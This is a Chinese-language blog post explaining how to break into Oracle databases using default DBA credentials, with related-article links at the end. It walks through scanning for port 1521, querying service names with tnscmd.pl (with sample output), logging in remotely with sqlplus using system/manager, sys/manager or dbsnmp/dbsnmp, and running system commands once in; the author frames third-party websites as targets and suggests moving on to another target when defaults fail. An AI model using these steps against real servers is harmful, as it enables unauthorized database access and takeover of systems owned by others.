oracle弱口令攻击

 

0x00 oracle数据库简介


oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:

一、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到>几百千兆,可充分利用硬件设备。支持大量用户同时在

同一数据上执行各种数据应用,并使数据争用最小,保证数据一致性。系统维护具有高>的性能,Oracle每天可连续24小时工作,正常的系统操作

(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性,可在数据库级或在子数据库级上控制。

二、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以>它是一个开放系统,保护了用户的投资。美国标准化和技术

研究所(NIST)对Oracle7 SERVER进行检验,100%地与ANSI/ISO SQL89标准的二级相>兼容。

三、实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全>性。Oracle实施数据完整性,为可接受的数据指定标准。

四、支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络,允许将处理分为数据库服务器和客户应用程序,所有共享的数据管理 由数据库管理系统的计算机处理,而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境,Oracle将存放在多台计算机上的 数据组合成一个逻辑数据库,可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。 具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运 行,以致Oracle上所开发的应用 可移植到任何操作系统,只需很少修改或不需修改。Oracle软件同工业标准相兼容,包括很多工业标准的操作系统, 所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE允许不同类型的计算机和操作系统通过网络可共享信息。


虽然Oracle数据库具有很高的安全性,但是如果我们在配置的时候不注意安全意识,那么也是很危险的。也就是说,安全最主要的还是要靠人自己,而不能过分依赖软件来实现。


我们知道,在 mssql中,安装完成后默认有个sa的登陆密码为空,如果不更改就会产生安全漏洞。那么 oracle呢?也有的。

为了安装和调试的方便,Oracle数据库中的两个具有 DBA权限的用户 SysSystem的缺省密码是 manager

笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码,其中也包括很多大型的电子商务网站, 我们就可以利用


进行测试前我们先来了解一些相关的知识,我们连接一个 Oracle数据库的时候,需要知道它的 service_name或者是 Sid值,就象 mssql一样,需要知道数据库名。那如何去知道呢,猜?呵呵,显然是不行的。这里我们先讲讲 oracleTNS listener,它位于数据库 Client和数据库 Server之间,默认监听1521端口,这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话,oracle将不会返回它的banner,如果你输入一些东西的话,它甚至有可能把你踢出去。这里我们就需要用 tnscmd.pl这个 perl程序了,它可以查询远程oracle数据库是否开启(也就是ping了),查询版本,以及查询它的服务

名,服务状态和数据库服务名,而且正确率很高。


0x01 oracle弱口令攻击


理论方面的讲完了,如果还有什么不懂的可以去查找相关资料。现在开始测试吧,需要的工具有: ActivePerlOracle客户端Superscan或者是 其它扫描端口的软件Tnscmd.pl

我们先用 Superscan扫描开放了端口1521的主机,假设其IP是 xx.xx.110.110,这样目标已经有了。然后我们要做的就是用Tnscmd.pl 来查询远程数据库的服务名了,Tnscmd.pl的用法如下:

C:perlbin>perl tnscmd.pl
usage: tnscmd.pl [command] -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate TCP port to use ()
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own CONNECT_DATA string
[--cmdsize bytes] - fake TNS command size (reveals packet leakage)

我们下面用的只有简单的几个命令,其他的命令也很好用,一起去发掘吧。

然后我们就这样来:

C:perlbin>perl tnscmd.pl services -h xx.xx. –indent
sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.
writing  bytes
reading
._................?. ..........
DESCRIPTION=
TMP=
VSNNUM=
ERR=
SERVICES_EXIST=
.Q........
SERVICE=
SERVICE_NAME=ORCL
INSTANCE=
INSTANCE_NAME=ORCL
NUM=
INSTANCE_CLASS=ORACLE
HANDLER=
HANDLER_DISPLAY=DEDICATED SERVER
STA=ready
HANDLER_INFO=LOCAL SERVER
HANDLER_MAXLOAD=
HANDLER_LOAD=
ESTABLISHED=
REFUSED=
HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
HANDLER_NAME=DEDICATED
ADDRESS=
PROTOCOL=beq
PROGRAM=/home/oracle/bin/oracle
ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'
ARGV0=oracleORCL
ARGS='
LOCAL=NO
'
.........@  

从上面得到的信息我们可以看出数据库的服务名为ORCL,然后我们就可以通过 sqlplus工具来远程连上它了,

用户名和密码我们用默认的 system/manager或者是 sys/manager,其他的如 mdsys/mdsysctxsys/ctxsys等,

这个默认用户和密码是随版本的不同而改变的。如下:

  1. C:oracleora90BIN>sqlplus /nolog
  2. SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002
  3. (c) Copyright 2001 oracle Corporation. All rights reserved.
  4. SQL>connect system/manager@
  5. (description=(address_list=(address=(protocol=tcp)
  6. (host=xx.xx.110.110)(port=1521)))
  7. (connect_data=(SERVICE_NAME=ORCL)));

如果密码正确,那么就会提示 connected,如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用 dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了,那我们只能换别的目标了。但是我发现很多都是不改的,这个就是安全意识的问题了。


0x02 上面提到的两个小软件:

tnscmd.pl

  1. 代码: tnscmd.pl

用链表实现的oracle密码暴破程序

  1. 代码: 用链表实现的oracle密码暴破程序

0x03 利用弱口令进行入侵:

#
C:\>sqlplus /nolog
SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com)
(port=)))(connect_data=(SERVICE_NAME=ora9i)));

然后利用 OracleExecuteCommandSqlScript来执行系统命令

oracle弱口令攻击的更多相关文章

  1. snmap弱口令攻击利用

    科普Snmap: 简单网络管理协议(SNMP) 是专门设计用于在 IP 网络管理网络节点(服务器.工作站.路由器.交换机及HUBS等)的一种标准协议,它是一种应用层协议.具体废话就不多说了,自己百度去 ...

  2. web渗透学习目录

    一,基础学习 01.基础学习 [[编码总结]] [[JSON三种数据解析方法]] [[js加密,解密]] [[Internet保留地址和非保留地址.内网和公网.VNC和UltraVN]] 代理 [[S ...

  3. Oracle、MySql、Sql Server比对

    1.    价格 MySql:廉价(部分免费):当前,MySQL採用双重授权(DualLicensed),他们是GPL和MySQLAB制定的商业许可协议.假设你在一个遵循GPL的自由(开源)项目中使用 ...

  4. IoT设备上的恶意软件——通过漏洞、弱密码渗透

    2018年,是 IoT 高速发展的一年,从空调到电灯,从打印机到智能电视,从路由器到监控摄像头统统都开始上网.随着5G网络的发展,我们身边的 IoT 设备会越来越多.与此同时,IoT 的安全问题也慢慢 ...

  5. Window应急响应(四):挖矿病毒

    0x00 前言 ​ 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一.病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升 ...

  6. 构建Jenkins自动化编译管理环境

    今天研究了一下Jenkins,有了一个粗浅的认识,顺手把构建的过程说一下,后续慢慢补充: (1)Secure CRT 连接到Linux服务器 要注意的一点是,要搞好一个文件传输的路子,否则不好传东西. ...

  7. 5.Windows应急响应:挖矿病毒

    0x00 前言 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一.病毒 传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降, 电脑温度升 ...

  8. windows 应急流程及实战演练

    前言 本文摘自信安之路公众号的文章. 当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事 ...

  9. nmap脚本扫描使用总结

    nmap的脚本默认目录为:/usr/share/nmap/scripts/ Nmap提供的命令行参数如下 -sC: 等价于--script=default,使用默认类别的脚本进行扫描 可更换其他类别 ...

随机推荐

  1. 深入理解three.js中光源

    前言: Three.js 是一个封装了 WebGL 接口的非常好的库,简化了 WebGL 很多细节,降低了学习成本,是当前前端开发者完成3D绘图的得力工具,那么今天我就给大家详细讲解下 Three.j ...

  2. Yum未完成事务问题

    1.安装 yum-complete-transaction [root@linux-node1 ~]# yum -y install yum-utils 2.清除yum缓存 [root@linux-n ...

  3. win下的mongodb安装和基础操作

    一.下载地址: https://www.mongodb.com/download-center/community 二.安装错误: 1.安装过程中报错(类似下图): 原因:没有管理员权限 解决:管理员 ...

  4. Linux之正则表达式grep

    真好!

  5. 37 (OC)* 类别的作用

    问题: OC中类别(Category)是什么?Category类别是Objective-C语言中提供的一个灵活的类扩展机制.类别用于在不获悉.不改变原来代码的情况下往一个已经存在的类中添加新的方法,只 ...

  6. 大白话讲解 Java程序的运行机制和JVM

    据我们所知,Java程序是跨平台的.那么Java是如何实现跨平台的呢?看完下面几句话就会恍然大悟! 1.为什么Java语言既是编译型语言又是解释型语言呢? 答:运行Java程序,首先需要经过编译,编译 ...

  7. 文章导航-readme

    Spring-Boot Spring Boot(一) Hello World Redis 图解Redis之数据结构篇--简单动态字符串SDS 图解Redis之数据结构篇--链表 图解Redis之数据结 ...

  8. 利用sqlalchemy 查询视图

    这个问题 google 百度 中英文搜了一上午.最新的回答还是 7年前.最后自己靠着官方文档的自己改出来一个比较方便的方法 使用环境 python == 3.7.0 SQLAlchemy === 1. ...

  9. 【福利】离散&C++&硬件一笔记合集

    离散 C++ 硬件

  10. TensorFlow2.0(四):填充与复制

    .caret, .dropup > .btn > .caret { border-top-color: #000 !important; } .label { border: 1px so ...